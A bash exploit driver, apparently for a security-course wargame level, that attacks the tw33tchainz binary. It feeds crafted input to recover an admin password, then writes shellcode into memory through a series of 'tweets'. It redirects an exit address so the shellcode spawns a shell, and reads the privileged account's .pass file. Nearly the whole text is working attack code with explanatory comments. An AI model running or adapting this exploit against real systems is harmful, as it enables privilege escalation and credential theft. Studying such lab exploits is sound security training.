Bash driver to exploit tw33tchainz
# Scratch files: input() appends everything sent to the target to
# $input_file (tail -f streams it into the binary) and mirrors it to
# $debug_file. Both are recreated empty on every run.
input_file="inputs"
debug_file="debug"
rm -- "$input_file" "$debug_file"
touch -- "$input_file" "$debug_file"
# the target binary and the file of hex values (the author treats each
# whitespace-separated word as one byte)
binary="/levels/project1/tw33tchainz"
shellCode="/tmp/bleached/project1/binsh.hex"
# number of whitespace-separated words in $shellCode
shellCodeSize=$(cat "$shellCode" | wc -w)
# lines read since the last "5: Exit" menu line; the main loop resets it to 0
stepsSinceExit=999
# state-machine constants plus its current state and per-state counter
programState=0
numTweets=0
WAIT=999
GET_PASS=1000
GET_ADMIN=1001
WRITE_SHELL=1002
WRITE_EXIT=1003
writeAddr="0x0804c0c1"
exitAddr="0x0804c038"
# writeAddr split into its four bytes in reversed (little-endian) order,
# i.e. "c1 c0 04 08"; the address is a fixed 10-character "0x…" literal
writeAddrValues="${writeAddr:8:2} ${writeAddr:6:2} ${writeAddr:4:2} ${writeAddr:2:2}"
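#######################################
# Append text for the target to $input_file and mirror it to the debug log.
# Globals:   input_file (appended), debug_file (appended)
# Arguments: $1 - printf format, always a literal at the call sites
#                 (e.g. "3\n" or "%s\n"); keep data in $2, never in $1
#            $2 - optional value substituted into the format
# Outputs:   nothing on stdout
#######################################
input() {
  local fmt=$1
  local val=${2-}
  # identical bytes go to both files, so the debug log is an exact copy of
  # what tail -f feeds the binary; the log path comes from $debug_file
  # rather than a hard-coded "debug" so the two names cannot drift apart
  printf "$fmt" "$val" >> "$input_file"
  printf "$fmt" "$val" >> "$debug_file"
}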
# Main driver: whatever input() appends to $input_file is streamed by tail -f
# into the target binary, and the binary's stdout is read back here one line
# at a time. All three pipeline stages run in subshells, so nothing assigned
# inside the loop is visible after 'done'. 'read' without -r also interprets
# backslashes and strips leading/trailing IFS whitespace from each line.
tail -f $input_file | $binary | while read output
do
# Strip ANSI escape sequences (colours, screen clears) so the exact-string
# patterns in the second case block can match the bare line.
output="$(echo "$output" | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g")"
echo "$output"
# State machine keyed on programState. Each arm sends input only at a fixed
# value of stepsSinceExit, i.e. a fixed number of lines after the most recent
# "5: Exit" menu line (that counter is reset in the second case block).
case "$programState" in
$GET_PASS)
# This is the first line read after "Generated Password:"; decode_pass.py
# (not on this page) is expected to turn it into the password.
genpass="$output"
password="$(python decode_pass.py $genpass)"
programState=$GET_ADMIN
;;
$GET_ADMIN)
if [ "$stepsSinceExit" == "1" ]
then
# menu option 3, followed by the recovered password
input "3\n"
input "%s\n" "$password"
programState=$WRITE_SHELL
fi
;;
$WRITE_SHELL)
# Since we're admin now it's 2 steps away
if [ "$stepsSinceExit" == "2" ]
then
# menu option 1, then one tweet per whitespace-separated word of $shellCode;
# get_tweet.py (not on this page) builds the tweet from the address, the
# word index and the word itself.
input "1\n"
hexVal=$(cat $shellCode | cut -d' ' -f$(($numTweets+1)))
tweet=$(python get_tweet.py $writeAddr $numTweets $hexVal)
# tsize is computed here but never read anywhere in this loop
tsize=$(echo $tweet | wc -c)
input "%s\n" "$tweet"
numTweets=$(($numTweets+1))
# move on once every word of the file has been sent ($shellCodeSize = wc -w)
if [ ! $numTweets -lt $shellCodeSize ]
then
programState=$WRITE_EXIT
numTweets=0
fi
fi
;;
$WRITE_EXIT)
if [ "$stepsSinceExit" == "2" ]
then
# Same procedure, now with the four byte values of $writeAddrValues and
# $exitAddr passed to get_tweet.py.
input "1\n"
hexVal=$(echo $writeAddrValues | cut -d' ' -f$(($numTweets+1)))
tweet=$(python get_tweet.py $exitAddr $numTweets $hexVal)
input "%s\n" "$tweet"
numTweets=$(($numTweets+1))
if [ ! $numTweets -lt 4 ]
then
# NOTE(review): EXIT is never assigned anywhere in this file, so $EXIT
# expands to the empty string; programState becomes "" and matches the
# (equally empty) "$EXIT)" label below only by that accident.
programState=$EXIT
numTweets=0
fi
fi
;;
$EXIT)
if [ "$stepsSinceExit" == "2" ]
then
# menu option 5 ("5: Exit")
input "5\n"
# wait for the shell to fire up
sleep 1
input "cat /home/project1_priv/.pass\n"
# WAIT (999) matches no arm in this case block, so the driver idles from here
programState=$WAIT
fi
;;
*)
# Do nothing (the initial state 0 and WAIT both land here)
;;
esac
# Line-triggered transitions, evaluated regardless of programState.
case "$output" in
"Enter Username:")
# 'print' as a statement: this relies on 'python' being Python 2
input "%s" "$(python -c "print '\x01'*15")"
;;
"Enter Salt:")
input "%s" "$(python -c "print '\xff'*15")"
;;
"Generated Password:")
# the value itself arrives on the next line and is handled by $GET_PASS above
programState=$GET_PASS
input "\n"
;;
"5: Exit"*)
# last menu entry: restart the per-menu line counter
stepsSinceExit=0
;;
*)
# Do nothing
;;
esac
stepsSinceExit=$(($stepsSinceExit + 1))
done